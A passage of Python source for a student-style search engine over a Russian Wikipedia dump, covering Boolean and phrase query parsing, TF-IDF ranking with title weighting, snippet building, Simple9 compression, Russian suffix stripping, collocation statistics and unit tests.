(stack[-1][0] == TokenType.OPERATOR_UNO or stack[-1][1] == token_value\n or (stack[-1][1] == '&&' and token_value == '||')):\n result.append(stack.pop())\n stack.append([token_type, token_value])\n if last_token_type[0] == TokenType.OPERATOR_BIN or last_token_type[0] == TokenType.OPERATOR_UNO:\n return None\n while len(stack) > 0:\n if stack[-1][0] == TokenType.OPERATOR_BIN or stack[-1][0] == TokenType.OPERATOR_UNO:\n result.append(stack.pop())\n else:\n return None\n\n return result\n\n\ndef positional_intersect_ids(data, p, coordinate_index_file_name):\n token_number = len(data)\n\n if token_number == 1:\n return [x for x, y in data[0]]\n\n intersect = data[0]\n for k in range(1, token_number):\n temp = []\n n, m = len(intersect), len(data[k])\n i, j = 0, 0\n\n while i < n and j < m:\n if intersect[i][0] < data[k][j][0]:\n i += 1\n elif data[k][j][0] < intersect[i][0]:\n j += 1\n else:\n page_id = intersect[i][0]\n offsets = intersect[i][1]\n\n if k == 1:\n offsets = [offsets]\n\n offsets.append(data[k][j][1])\n temp.append([page_id, offsets])\n\n i += 1\n j += 1\n\n intersect = temp\n\n #print('intersect: ', intersect)\n result = []\n for page_id, offsets in intersect:\n coordinates = []\n for offset in offsets:\n coordinates.append(read_coordinates(coordinate_index_file_name, offset))\n #print('coordinates:', coordinates)\n indexes = [0] * token_number\n while True:\n final = False\n for i in range(token_number):\n if indexes[i] >= len(coordinates[i]):\n final = True\n break\n\n if final:\n break\n\n i = 0\n another_token_number = p - token_number + 1\n while i < token_number - 1:\n while indexes[i] < len(coordinates[i]) and indexes[i+1] < len(coordinates[i+1]):\n if coordinates[i+1][indexes[i+1]] - coordinates[i][indexes[i]] > another_token_number + 1:\n indexes[i] += 1\n elif coordinates[i][indexes[i]] >= coordinates[i+1][indexes[i+1]]:\n indexes[i+1] += 1\n else:\n distance = coordinates[i+1][indexes[i+1]] - coordinates[i][indexes[i]]\n another_token_number -= distance - 1\n i += 1\n break\n if i < token_number - 1 and (indexes[i] >= len(coordinates[i]) or indexes[i+1] >= len(coordinates[i+1])):\n break\n\n if i == token_number - 1:\n result.append(page_id)\n break\n\n #print('result:', result)\n return result\n\n\ndef get_page_ids_by_request(request, dictionary, inverse_index_file_name,\n all_page_ids, coordinate_index_file_name, jump_table_file_name,\n inverse_index_title_file_name, coordinate_index_title_file_name):\n rpn = get_RPN_by_request(request)\n stack = []\n stack_title = []\n for token_type, token_value in rpn:\n if token_type == TokenType.LEXEME:\n hash_token = hash_used(remove_rus_ending(token_value))\n if hash_token not in dictionary.keys():\n stack.append([False, []])\n else:\n number_ids, offset, jump_table_offset, offset_title = dictionary[hash_token]\n if jump_table_offset == -1:\n stack.append([False, [x for x, y in read_page_ids(inverse_index_file_name, offset, number_ids)]])\n else:\n stack.append([True, read_jump_table(jump_table_file_name, jump_table_offset), offset])\n stack_title.append([False, [x for x, y in read_page_ids(inverse_index_title_file_name, offset_title)]])\n elif token_type == TokenType.QUOTE:\n data = []\n data_title = []\n for token in token_value[0]:\n hash_token = hash_used(remove_rus_ending(token))\n number_ids, offset, jump_table_offset, offset_title = dictionary[hash_token]\n data.append(read_page_ids(inverse_index_file_name, offset))\n data_title.append(read_page_ids(inverse_index_title_file_name, offset_title))\n stack.append([False, positional_intersect_ids(data, token_value[1], coordinate_index_file_name)])\n stack_title.append([False, positional_intersect_ids(data_title, token_value[1], coordinate_index_title_file_name)])\n elif token_type == TokenType.OPERATOR_UNO:\n if len(stack) == 0:\n return None\n value = stack.pop()\n value_title = stack_title.pop()\n if token_value == '!':\n stack.append([False, difference_ids([False, all_page_ids], value, inverse_index_file_name)])\n stack_title.append([False, difference_ids([False, all_page_ids], value_title, inverse_index_title_file_name)])\n else:\n return None\n elif token_type == TokenType.OPERATOR_BIN:\n if len(stack) < 2:\n return None\n value_a = stack.pop()\n value_b = stack.pop()\n value_a_title = stack_title.pop()\n value_b_title = stack_title.pop()\n\n if token_value == '&&':\n stack.append([False, intersection_ids(value_a, value_b, inverse_index_file_name)])\n stack_title.append([False, intersection_ids(value_a_title, value_b_title, inverse_index_title_file_name)])\n elif token_value == '||':\n stack.append([False, union_ids(value_a, value_b, inverse_index_file_name)])\n stack_title.append([False, union_ids(value_a_title, value_b_title, inverse_index_title_file_name)])\n else:\n return None\n else:\n return None\n\n if len(stack) != 1 or len(stack_title) != 1:\n return None\n\n if stack[0][0]:\n return [x for x, y in read_page_ids(inverse_index_file_name, stack[0][2])]\n\n return [stack[0][1], stack_title[0][1]]\n\n\ndef get_SERP_by_request(request, dictionary, inverse_index_file_name, all_page_ids,\n straight_index, coordinate_index_file_name, jump_table_file_name,\n all_page_ids_with_stat, token_file_name, inverse_index_title_file_name,\n coordinate_index_title_file_name):\n terms = ''\n is_boolean_request = False\n for i in range(len(request)):\n if request[i].isalpha() or request[i].isdigit():\n terms += request[i]\n else:\n terms += ' '\n if request[i] in ['&', '|', '(', '[', '{', ')', ']', '}', '!', '\"']:\n is_boolean_request = True\n terms = terms.lower()\n terms = [remove_rus_ending(t) for t in terms.split()]\n\n page_ids = [False, []]\n page_ids_title = [False, []]\n if is_boolean_request:\n page_ids, page_ids_title = get_page_ids_by_request(request, dictionary, inverse_index_file_name, all_page_ids,\n coordinate_index_file_name, jump_table_file_name,\n inverse_index_title_file_name, coordinate_index_title_file_name)\n else:\n for term in terms:\n term_hash = hash_used(term)\n if term_hash not in dictionary.keys():\n continue\n page_ids = [False, union_ids(page_ids,\n [False, [x for x,y in read_page_ids(inverse_index_file_name, dictionary[term_hash][1])]],\n inverse_index_file_name)]\n page_ids_title = [False, union_ids(page_ids,\n [False, [x for x,y in read_page_ids(inverse_index_title_file_name, dictionary[term_hash][3])]],\n inverse_index_title_file_name)]\n page_ids = page_ids[1]\n page_ids_title = page_ids_title[1]\n\n collection_length = len(all_page_ids)\n\n if (page_ids is None and page_ids_title is None) or (len(page_ids) == 0 and len(page_ids_title)):\n return None\n\n page_ids = [[x, 0.0] for x in page_ids]\n page_ids_title = [[x, 0.0] for x in page_ids_title]\n\n for term in terms:\n term_hash = hash_used(term)\n if term_hash not in dictionary.keys():\n continue\n\n number_ids, offset, jump_table_offset, offset_title = dictionary[term_hash]\n page_ids_info = read_page_ids(inverse_index_file_name, offset)\n for_bisect = [x for x, y in page_ids_info]\n page_ids_info_title = read_page_ids(inverse_index_title_file_name, offset_title)\n for_bisect_title = [x for x, y in page_ids_info_title]\n\n if len(page_ids_info) > 0:\n for i in range(len(page_ids)):\n index_page_id = bisect.bisect_left(for_bisect, page_ids[i][0])\n term_entering_number = 0\n if index_page_id < len(page_ids_info) and page_ids_info[index_page_id][0] == page_ids[i][0]:\n term_entering_number = read_number_coordinates(coordinate_index_file_name,\n page_ids_info[index_page_id][1])\n page_ids[i][1] += ((term_entering_number / all_page_ids_with_stat[page_ids[i][0]]) * math.log2(collection_length / len(page_ids_info))) * (1.0 - TITLE_TF_IDF_WEIGHT)\n if len(page_ids_info_title) > 0:\n for i in range(len(page_ids_title)):\n index_page_id_title = bisect.bisect_left(for_bisect_title, page_ids_title[i][0])\n term_entering_number = 0\n if index_page_id_title < len(page_ids_info_title) and page_ids_info_title[index_page_id_title][0] == page_ids_title[i][0]:\n term_entering_number = read_number_coordinates(coordinate_index_title_file_name,\n page_ids_info_title[index_page_id_title][1])\n page_ids_title[i][1] += (term_entering_number / len(straight_index[page_ids_title[i][0]][1].split())) * math.log2(collection_length / len(page_ids_info_title)) * TITLE_TF_IDF_WEIGHT\n\n page_ids_result = []\n index_i, index_j = 0, 0\n while index_i < len(page_ids) and index_j < len(page_ids_title):\n if page_ids[index_i][0] == page_ids_title[index_j][0]:\n page_ids_result.append([page_ids[index_i][0], page_ids[index_i][1]*(1.0-TITLE_TF_IDF_WEIGHT)+\n page_ids_title[index_j][1]*TITLE_TF_IDF_WEIGHT])\n index_i += 1\n index_j += 1\n elif page_ids[index_i][0] > page_ids_title[index_j][0]:\n page_ids_result.append([page_ids_title[index_i][0], page_ids_title[index_j][1]*TITLE_TF_IDF_WEIGHT])\n index_j += 1\n else:\n page_ids_result.append([page_ids[index_i][0], page_ids[index_i][1] * (1.0 - TITLE_TF_IDF_WEIGHT)])\n index_i += 1\n while index_i < len(page_ids):\n page_ids_result.append([page_ids[index_i][0], page_ids[index_i][1] * (1.0 - TITLE_TF_IDF_WEIGHT)])\n index_i += 1\n while index_j < len(page_ids_title):\n page_ids_result.append([page_ids_title[index_i][0], page_ids_title[index_j][1] * TITLE_TF_IDF_WEIGHT])\n index_j += 1\n\n page_ids = page_ids_result\n page_ids.sort(key=lambda a: a[1], reverse=True)\n page_ids = page_ids[0:STATES_NUMBER_IN_SERP]\n first_coordinates = dict()\n for term in terms:\n term_hash = hash_used(term)\n if term_hash not in dictionary.keys():\n continue\n\n number_ids, offset, jump_table_offset, _ = dictionary[term_hash]\n page_ids_info = read_page_ids(inverse_index_file_name, offset)\n for_bisect = [x for x, y in page_ids_info]\n\n for page_id, _ in page_ids:\n index_page_id = bisect.bisect_left(for_bisect, page_id)\n if index_page_id < len(page_ids_info) and page_ids_info[index_page_id][0] == page_id:\n first_coordinate = read_first_coordinate(coordinate_index_file_name, page_ids_info[index_page_id][1])\n if page_id not in first_coordinates.keys():\n first_coordinates[page_id] = [first_coordinate]\n else:\n first_coordinates[page_id].append(first_coordinate)\n\n serp = ''\n for page_id, _ in page_ids:\n link, title, state_offset = straight_index[page_id]\n page_data = read_page_by_id(token_file_name, straight_index, page_id)[len(title.split()):]\n description = ''\n last_added_coordinate = -1\n first_coordinates[page_id].sort()\n line_length = 0\n line_number = 0\n #print(page_data[0:10], first_coordinates[page_id])\n for first_coordinate in first_coordinates[page_id]:\n old_length = len(description)\n if last_added_coordinate >= max(first_coordinate - SNIPPET_WINDOW_SIZE, 0):\n description += ' '.join(page_data[last_added_coordinate+1:first_coordinate+SNIPPET_WINDOW_SIZE+1])\n else:\n description += '... ' + ' '.join(page_data[max(first_coordinate - SNIPPET_WINDOW_SIZE, 0):first_coordinate + SNIPPET_WINDOW_SIZE + 1])\n line_length += len(description) - old_length\n if line_length >= SNIPPET_LINE_LENGTH:\n description += '\\n'\n line_number += 1\n line_length = 0\n if line_number >= SNIPPET_LINE_NUMBER:\n break\n description += ' '\n last_added_coordinate = first_coordinate + SNIPPET_WINDOW_SIZE\n\n serp += title + '\\n' + link + '\\n\\n' + description + '\\n'\n serp += '-------------------------------------------------------------\\n\\n'\n return serp\n\n\nclass TestSearch(unittest.TestCase):\n\n def test01_RPN_positive(self):\n infix = ['qwe && ewq\\n', '(qwe &&ewq) r ty', '!q&&(we||r)&&fgh&&(ert&&(zxc||!uio))\\n',\n ' ! q ( we || r ) fgh ( ert && ( zxc || ! uio ) ) \\n',\n '[!q&&(we||r)&&fgh&&(ert&&{zxc||!uio})]', '(qwe || !ew) && (ewq || (asd && !uy))',\n '! (qwe&&rty||df j) ', 'qwe df || qwe rt y', '\"qwe ewq: asd?\" rty uuu',\n 'rty \"qwe ewq: asd?\"&&uuu', '\"qwe ewq: asd?\"', ' \"qwe ewq: asd?\"/ 10|| dfg',\n ' [ { \"qwe ewq: asd?\"/ 10}|| (dfg || fgh)]', '\"qwe ewq: asd?\"/2', 'xcv !\"qwe ewq: asd?\"/2',\n '\"Дополнение продолжает оригинальный Quake\" \"через месяца месяца\" / 3',\n '\"Дополнение продолжает оригинальный Quake\"/ 56 \"через месяца месяца\" / 3'\n ]\n rpn = [['qwe', 'ewq', '&&'], ['qwe', 'ewq', '&&', 'r', '&&', 'ty', '&&'],\n ['q', '!', 'we', 'r', '||', '&&', 'fgh', '&&', 'ert', 'zxc', 'uio', '!', '||', '&&', '&&'],\n ['q', '!', 'we', 'r', '||', '&&', 'fgh', '&&', 'ert', 'zxc', 'uio', '!', '||', '&&', '&&'],\n ['q', '!', 'we', 'r', '||', '&&', 'fgh', '&&', 'ert', 'zxc', 'uio', '!', '||', '&&', '&&'],\n ['qwe', 'ew', '!', '||', 'ewq', 'asd', 'uy', '!', '&&', '||', '&&'],\n ['qwe', 'rty', '&&', 'df', 'j', '&&', '||', '!'],\n ['qwe', 'df', '&&', 'qwe', 'rt', '&&', 'y', '&&', '||'],\n [[['qwe', 'ewq', 'asd'], 2], 'rty', '&&', 'uuu', '&&'],\n ['rty', [['qwe', 'ewq', 'asd'], 2], '&&', 'uuu', '&&'],\n [[['qwe', 'ewq', 'asd'], 2]], [[['qwe', 'ewq', 'asd'], 10], 'dfg', '||'],\n [[['qwe', 'ewq', 'asd'], 10], 'dfg', 'fgh', '||', '||'],\n [[['qwe', 'ewq', 'asd'], 2]],\n ['xcv', [['qwe', 'ewq', 'asd'], 2], '!', '&&'],\n [[['дополнение', 'продолжает', 'оригинальный', 'quake'], 3], [['через', 'месяца', 'месяца'], 3], '&&'],\n [[['дополнение', 'продолжает', 'оригинальный', 'quake'], 56], [['через', 'месяца', 'месяца'], 3], '&&']\n ]\n\n for i in range(len(infix)):\n #print(infix[i])\n test = get_RPN_by_request(infix[i])\n self.assertTrue(test is not None, infix[i])\n self.assertTrue(len(test) == len(rpn[i]), infix[i])\n for j in range(len(rpn[i])):\n self.assertEqual(rpn[i][j], test[j][1], infix[i])\n\n def test02_RPN_negative(self):\n infix = ['qwe & ewq', '(qwe &&ewq r ty', '!q&&(we||r)||&&fgh&&(ert&&(zxc||!uio))',\n ' ! q ( we || r ) fgh ( ert && ( zxc || ! uio ) ) &&',\n '[!q&&(we||r)&&fgh&&(ert&&[zxc||!uio})]', '(qwe || !ew) && (ewq || (asd && !uy)',\n '! (qwe&&rty||df j) ! ', '&& qwe ||ewq', '\"qwe ewq: asd?/2', 'qwe ewq: asd?\"/2',\n '\"qwe ewq: asd?\"/', '\"qwe ewq: asd?\"/ (qwe || asd)', '\"qwe ewq: asd?\"/01',\n '\"qwe ewq: asd?\"2', '\"qwe ewq: asd?\"/2asd', '\"qwe ewq: asd?\"//2', '!\"qwe ewq: asd?\"\"/2&&qwe',\n '!\"\"qwe ewq: asd?\"/2&&qwe', '\"\"', 'qwe \"asd d\" fgh \"rty ', ' \"qwe rty\"\"fgh jh\" / 3',\n ' \"qwe rty uio\"/1 ', ' \"@ 123 321 11 11\" / 2 rty', ' \"ert ty\" /5tyu', ' \"ert ty\" / 5tyu'\n ]\n\n for i in range(len(infix)):\n #print(infix[i])\n test = get_RPN_by_request(infix[i])\n self.assertTrue(test is None, infix[i])\n i += 1\n\n def test03_search(self):\n dictionary_file_name = '../dictionary.bin'\n inverse_index_file_name = '../inverse_index.bin'\n all_page_ids_file_name = '../all_page_ids.bin'\n coordinate_index_file_name = '../coordinate_index.bin'\n jump_table_file_name = '../jump_table.bin'\n inverse_index_title_file_name = '../inverse_title_index.bin'\n coordinate_index_title_file_name = '../coordinate_title_index.bin'\n\n requests = ['Quake: Scourge of Armagon', 'Действие игры разворачивается в городе Эшфилд',\n 'doom 1993', 'python (PyCharm || Visual Studio Code || Emacs) ide',\n 'resident evil !wii',\n 'final fantasy (2015 || 2016 || 2017 || 2018 || 2019)',\n 'компилятор c++ windows (Linux ||unix)', 'идеал аскетизма философ',\n 'работа Сади Карно !(президент Франции)', # 43330\n 'принцип шести степеней свободы шутер !(Shattered Horizon)',\n '\"Дополнение продолжает оригинальный Quake\"', '\"через месяца месяца\" / 3',\n '\"Гремлин — внешне напоминает Рогача\"',\n '\"Гремлин — внешне напоминает Рогача Основная способность\" / 12',\n '\"Дополнение продолжает оригинальный Quake\" \"через месяца месяца\" / 3',\n '\"Дополнение продолжает оригинальный Quake\" / 5 || \"через месяца месяца\" / 3',\n '\"Движок игры был обновлён\" \"Главный герой возвращается на базу зомбинированных солдат\" / 15 \"через месяца месяца\" / 3'\n ]\n positive_ids = [[84966], [509283], [84968], [4227719], [3154423],\n [2384697], [234594], [2995], [], [819887], [84966], [84966], [84966], [84966], [84966],\n [84966], [84966]\n ]\n negative_ids = [[52826], [], [], [6246771, 17710], [1011645, 715315], [2228067], [], [],\n [69114], [1454965], [], [], [], [], [], [], []\n ]\n\n dictionary = read_dictionary(dictionary_file_name)\n all_page_ids = read_all_page_ids(all_page_ids_file_name)\n for i in range(len(requests)):\n result, result_title = get_page_ids_by_request(requests[i], dictionary, inverse_index_file_name, all_page_ids,\n coordinate_index_file_name, jump_table_file_name,\n inverse_index_title_file_name, coordinate_index_title_file_name)\n self.assertIsNotNone(result)\n for pos_id in positive_ids[i]:\n self.assertIn(pos_id, result)\n for neg_id in negative_ids[i]:\n self.assertNotIn(neg_id, result)\n\n def test04_title_search(self):\n dictionary_file_name = '../dictionary.bin'\n inverse_index_file_name = '../inverse_index.bin'\n all_page_ids_file_name = '../all_page_ids.bin'\n coordinate_index_file_name = '../coordinate_index.bin'\n jump_table_file_name = '../jump_table.bin'\n inverse_index_title_file_name = '../inverse_title_index.bin'\n coordinate_index_title_file_name = '../coordinate_title_index.bin'\n\n requests = ['Quake: Scourge of Armagon', 'Dungeon Keeper 2', 'Wolfenstein', 'master orion',\n 'Warlords etheria', 'blackthorne', 'Фуллье'\n ]\n positive_ids = [[84966], [88956], [84591], [150269], [184586], [231098], [1064815]]\n negative_ids = [[52826], [], [], [], [], [], []]\n\n dictionary = read_dictionary(dictionary_file_name)\n all_page_ids = read_all_page_ids(all_page_ids_file_name)\n for i in range(len(requests)):\n _, result = get_page_ids_by_request(requests[i], dictionary, inverse_index_file_name, all_page_ids,\n coordinate_index_file_name, jump_table_file_name,\n inverse_index_title_file_name, coordinate_index_title_file_name)\n self.assertIsNotNone(result)\n for pos_id in positive_ids[i]:\n self.assertIn(pos_id, result)\n for neg_id in negative_ids[i]:\n self.assertNotIn(neg_id, result)\n\n\ndef stats_coordinates(dictionary_file_name, inverse_index_file_name, coordinate_index_file_name):\n dictionary = read_dictionary(dictionary_file_name)\n all_coordinates_number = 0\n pair_term_page_number = 0\n all_terms_number = len(dictionary)\n print(all_terms_number)\n i = 0\n for key in dictionary.keys():\n i += 1\n if i % 100000 == 0:\n print(i)\n number_ids, offset = dictionary[key]\n for page_ids, offset_coordinates in read_page_ids(inverse_index_file_name, offset, number_ids):\n pair_term_page_number += 1\n coordinates = read_coordinates(coordinate_index_file_name, offset_coordinates)\n all_coordinates_number += len(coordinates)\n print('Coordinates number:', all_coordinates_number)\n print('Average coordinates per term:', all_coordinates_number/all_terms_number)\n print('Average coordinates per pair term-page:', all_coordinates_number/pair_term_page_number)\n\n\ndef stat_before_compress_feat(token_file_name, dictionary_file_name, inverse_index_file_name, straight_index_file_name, coordinate_index_file_name):\n start_time = time.time()\n dictionary = read_dictionary(dictionary_file_name)\n print('dictionary read:', time.time() - start_time)\n start_time = time.time()\n straight_index = read_straight_index(straight_index_file_name)\n print('straight read:', time.time() - start_time)\n start_time = time.time()\n for key in dictionary:\n number_ids, offset = dictionary[key]\n read_page_ids(inverse_index_file_name, offset, number_ids)\n print('inverse read:', time.time() - start_time)\n start_time = time.time()\n for key in dictionary:\n number_ids, offset = dictionary[key]\n page_ids = read_page_ids(inverse_index_file_name, offset, number_ids)\n for id, offset_coord in page_ids:\n read_coordinates(coordinate_index_file_name, offset_coord)\n print('all terms coordinate read:', time.time() - start_time)\n\n token_file = open(token_file_name, 'r', encoding='utf-8')\n freq = dict()\n\n number_terms = 0\n for line in token_file:\n for token in line.split():\n if token.startswith(PAGE_TOKEN_PREFIX):\n continue\n number_terms += 1\n term = token.lower()\n\n if term not in freq:\n freq[term] = 1\n else:\n freq[term] += 1\n token_file.close()\n\n data = []\n for term in freq.keys():\n freq[term] /= number_terms\n data.append([term, freq[term]])\n\n number_terms_test = 1000\n\n data.sort(key=lambda a: a[1])\n\n start_time = time.time()\n for term, _ in data[0:number_terms_test]:\n number_ids, offset = dictionary[hash_used(term)]\n page_ids = read_page_ids(inverse_index_file_name, offset, number_ids)\n for id, offset_coord in page_ids:\n read_coordinates(coordinate_index_file_name, offset_coord)\n print('low freq terms coordinate read:', time.time() - start_time)\n\n start_time = time.time()\n for term, _ in data[(len(data) - number_terms_test) // 2:(len(data) + number_terms_test) // 2]:\n number_ids, offset = dictionary[hash_used(term)]\n page_ids = read_page_ids(inverse_index_file_name, offset, number_ids)\n for id, offset_coord in page_ids:\n read_coordinates(coordinate_index_file_name, offset_coord)\n print('middle freq terms coordinate read:', time.time() - start_time)\n\n start_time = time.time()\n for term, _ in data[-number_terms_test:]:\n number_ids, offset = dictionary[hash_used(term)]\n page_ids = read_page_ids(inverse_index_file_name, offset, number_ids)\n for id, offset_coord in page_ids:\n read_coordinates(coordinate_index_file_name, offset_coord)\n print('high freq terms coordinate read:', time.time() - start_time)\n\n\nclass Simple9Schemes:\n SCHEME_1 = [0, 1, 28]\n SCHEME_2 = [1, 2, 14]\n SCHEME_3 = [2, 3, 9]\n SCHEME_4 = [3, 4, 7]\n SCHEME_5 = [4, 5, 5]\n SCHEME_6 = [5, 7, 4]\n SCHEME_7 = [6, 9, 3]\n SCHEME_8 = [7, 14, 2]\n SCHEME_9 = [8, 28, 1]\n ALL_SCHEMES = [SCHEME_9, SCHEME_8, SCHEME_7, SCHEME_6, SCHEME_5, SCHEME_4, SCHEME_3, SCHEME_2, SCHEME_1]\n\n\ndef simple9_encode(sequence, jump_table_info_need=False):\n result = bytearray()\n n = len(sequence)\n i = 0\n jump_table_info = []\n used_byte_counter = 0\n while i < n:\n for scheme in Simple9Schemes.ALL_SCHEMES:\n code, number_elements, bit_length = scheme\n if i + (number_elements - 1) >= n:\n continue\n ok = True\n for j in range(number_elements):\n if sequence[i+j] > 2**bit_length - 1:\n ok = False\n break\n\n if ok:\n data = code\n data <<= (28-number_elements*bit_length)\n for j in range(number_elements):\n data <<= bit_length\n data |= sequence[i+j]\n\n if jump_table_info_need and used_byte_counter > 0 and used_byte_counter % JUMP_TABLE_SPACE_BYTES == 0:\n jump_table_info.append([i, used_byte_counter])\n\n result.extend(data.to_bytes(4, 'big'))\n used_byte_counter += 4\n i += number_elements\n\n if jump_table_info_need:\n return result, jump_table_info\n\n return result\n\n\ndef simple9_decode(data):\n result = []\n i = 0\n n = len(data)\n while i < n:\n buffer = int.from_bytes(data[i:i+4], 'big', signed=False)\n code = (buffer >> 28)\n _, number_elements, bit_length = Simple9Schemes.ALL_SCHEMES[-(code+1)]\n mask = (1 << bit_length)-1\n numbers = [0] * number_elements\n for j in range(number_elements):\n numbers[number_elements-(j+1)] = (buffer & mask)\n buffer >>= bit_length\n result.extend(numbers)\n i += 4\n\n return result\n\n\nclass Simple9Test(unittest.TestCase):\n\n def test01_encode_decode_equal_data(self):\n data = []\n length_data = 1000000\n max_number = 100\n\n for _ in range(length_data):\n data.append(random.randint(1, max_number))\n\n self.assertListEqual(simple9_decode(simple9_encode(data)), data)\n\n\ndef read_jump_table(jump_table_file_name, offset):\n data = open(jump_table_file_name, 'rb')\n data.seek(offset)\n\n first_page_id, compressed_page_ids_length = struct.unpack('ii', data.read(2*INTEGER_LENGTH))\n page_ids_difference = simple9_decode(data.read(compressed_page_ids_length))\n first_offset, compressed_coordinate_offset_length = struct.unpack('ii', data.read(2*INTEGER_LENGTH))\n offset_difference = simple9_decode(data.read(compressed_coordinate_offset_length))\n result = [[first_page_id, first_offset]]\n\n for page_id_diff, offset_diff in list(zip(page_ids_difference, offset_difference)):\n result.append([result[-1][0]+page_id_diff, result[-1][1]+offset_diff])\n\n data.close()\n\n return result\n\n\ndef read_first_page_id_and_length_compress_data(inverse_index_file_name, offset):\n data = open(inverse_index_file_name, 'rb')\n data.seek(offset)\n\n first_page_id, length_compress_data = struct.unpack('ii', data.read(INTEGER_LENGTH*2))\n\n data.close()\n\n return first_page_id, length_compress_data\n\n\ndef read_block_page_ids(jump_table, block_id, inverse_index_file_name, offset_inverse_index):\n data = open(inverse_index_file_name, 'rb')\n result = []\n\n first_page_id, length_compress_data = read_first_page_id_and_length_compress_data(inverse_index_file_name,\n offset_inverse_index)\n\n if block_id == -1:\n result.append(first_page_id)\n offset_inverse_index += INTEGER_LENGTH * 2\n\n data.seek(offset_inverse_index)\n differences_page_ids = simple9_decode(data.read(JUMP_TABLE_SPACE_BYTES))\n\n for page_id_diff in differences_page_ids:\n result.append(result[-1]+page_id_diff)\n # print('jump table:', jump_table)\n # print('first block:', len(result))\n # print('fist 50 elem:', result[0:50])\n # print('last 50 elem:', result[len(result)-50:])\n else:\n block_first_page_id, block_offset_inverse_index = jump_table[block_id]\n result.append(block_first_page_id)\n\n data.seek(block_offset_inverse_index)\n differences_page_ids = []\n if block_id == len(jump_table) - 1:\n # print('length_compress_data=', length_compress_data)\n # print('read len data:', length_compress_data - JUMP_TABLE_SPACE_BYTES * (block_id+1))\n differences_page_ids = simple9_decode(data.read(length_compress_data - JUMP_TABLE_SPACE_BYTES * (block_id + 1)))[1:]\n else:\n differences_page_ids = simple9_decode(data.read(JUMP_TABLE_SPACE_BYTES))[1:]\n\n for page_id_diff in differences_page_ids:\n result.append(result[-1]+page_id_diff)\n\n data.close()\n\n return result\n\n\ndef remove_rus_ending(word):\n rus_endings_verb = ['ать', 'ять', 'оть', 'еть', 'уть', 'у', 'ю', 'ем', 'им', 'ешь', 'ишь', 'ете', 'ите', 'ет',\n 'ит', 'ут', 'ют', 'ят', 'ал', 'ял', 'ала', 'яла', 'али', 'яли', 'ол', 'ел', 'ола', 'ела',\n 'оли', 'ели', 'ул', 'ула', 'ули']\n rus_endings_name = ['а', 'я', 'о', 'е', 'ь', 'ы', 'и', 'а', 'ая', 'яя', 'ое', 'ее', 'ой', 'ые', 'ие', 'ый', 'йй']\n rus_endings_flex = ['а', 'ам', 'ами', 'ас', 'ам', 'ax', 'ая', 'е', 'её', 'ей', 'ем', 'еми', 'емя', 'ex', 'ею',\n 'ёт', 'ёте', 'ёх', 'ёшь', 'и', 'ие', 'ий', 'им', 'ими', 'ит', 'ите', 'их', 'ишь', 'ию', 'м',\n 'ми', 'мя', 'о', 'ов', 'ого', 'ое', 'оё', 'ой', 'ом', 'ому', 'ою', 'см', 'у', 'ум',\n 'умя', 'ут', 'ух', 'ую', 'шь']\n\n rus_endings = []\n rus_endings.extend(rus_endings_verb)\n rus_endings.extend(rus_endings_name)\n rus_endings.extend(rus_endings_flex)\n\n valid_endings = []\n for ending in rus_endings:\n if word.endswith(ending) and len(word) > len(ending):\n valid_endings.append(ending)\n\n index_ending = -1\n max_length = -1\n for i in range(len(valid_endings)):\n if max_length < len(valid_endings[i]):\n max_length = len(valid_endings[i])\n index_ending = i\n\n if index_ending == -1:\n return word\n\n return word[0:len(word)-len(valid_endings[index_ending])]\n\n\ndef read_page_by_id(token_file_name, straight_index, page_id):\n token_file = open(token_file_name, 'r', encoding='utf-8')\n\n token_file.seek(straight_index[page_id][2])\n\n result = []\n for line in token_file:\n if line.startswith(PAGE_TOKEN_PREFIX):\n break\n result.extend(line.split())\n\n return result\n\n\ndef collocation_search(token_file_name):\n token_file = open(token_file_name, 'r', encoding='utf-8')\n student_out = open('../student_out.txt', 'w', encoding='utf-8')\n mle_out = open('../mle_out.txt', 'w', encoding='utf-8')\n\n unogramm_freq = dict()\n bigramm_freq = dict()\n last_token = ''\n token_number = 0\n for line in token_file:\n if line.startswith(PAGE_TOKEN_PREFIX):\n continue\n for token in line.lower().split():\n if len(token) < 3:\n continue\n if token in ['http', 'www', 'url', 'https', 'ref', 'br', 'html',\n 'en', 'lang', 'org', 'com', 'web', 'примечания', 'автор', 'deadurl', 'archiveurl',\n 'archivedate', 'accessdate', 'категория']:\n continue\n\n token_number += 1\n if token not in unogramm_freq.keys():\n unogramm_freq[token] = 1\n else:\n unogramm_freq[token] += 1\n\n if last_token != '':\n bigramm = last_token+' '+token\n if bigramm not in bigramm_freq.keys():\n bigramm_freq[bigramm] = 1\n else:\n bigramm_freq[bigramm] += 1\n\n last_token = token\n\n student_data = []\n for bigramm in bigramm_freq.keys():\n first, second = bigramm.split()\n p = unogramm_freq[first] * unogramm_freq[second] / token_number**2\n x = bigramm_freq[bigramm] / token_number\n t = (x - p) / math.sqrt(x/token_number)\n\n if t > 2.576:\n continue\n student_data.append([t, bigramm])\n\n mle_data = []\n eps = 1e-12\n for bigramm in bigramm_freq.keys():\n first, second = bigramm.split()\n p = unogramm_freq[second] / token_number\n p_1 = bigramm_freq[bigramm] / unogramm_freq[first]\n p_2 = (unogramm_freq[second] - bigramm_freq[bigramm]) / (token_number - unogramm_freq[first])\n if abs(p) < eps or abs(p_1) < eps or abs(p_2) < eps or abs(1.0-p) < eps or abs(1.0-p_1) < eps or abs(1.0-p_2) < eps:\n continue\n\n def log_l(k, n, x):\n return k * math.log2(x) + (n-k) * math.log2(1.0 - x)\n\n value = log_l(bigramm_freq[bigramm], unogramm_freq[first], p) + \\\n log_l(unogramm_freq[second] - bigramm_freq[bigramm], token_number - unogramm_freq[first], p) - \\\n log_l(bigramm_freq[bigramm], unogramm_freq[first], p_1) - \\\n log_l(unogramm_freq[second] - bigramm_freq[bigramm], token_number - unogramm_freq[first], p_2)\n value *= -2.0\n\n if value > 140.2:\n continue\n mle_data.append([value, bigramm])\n\n student_data.sort(key=lambda a: a[0], reverse=True)\n mle_data.sort(key=lambda a: a[0], reverse=True)\n\n data_length = 30\n for value, bigramm in student_data[0:data_length]:\n student_out.write(bigramm + '\\n')\n for value, bigramm in mle_data[0:data_length]:\n mle_out.write(bigramm + '\\n')\n\n token_file.close()\n student_out.close()\n mle_out.close()\n\n\ndef run():\n xml_file_name = '../Википедия-20190226103515.xml'\n data_file_name = '../data.txt'\n token_file_name = '../tokens.txt'\n assessment_file_name = '../assessment.txt'\n estimate_result_file_name = '../assessment_result.txt'\n dictionary_file_name = '../dictionary.bin'\n inverse_index_file_name = '../inverse_index.bin'\n straight_index_file_name = '../straight_index.bin'\n graph_output_file_name = '../graph_ziph.txt'\n 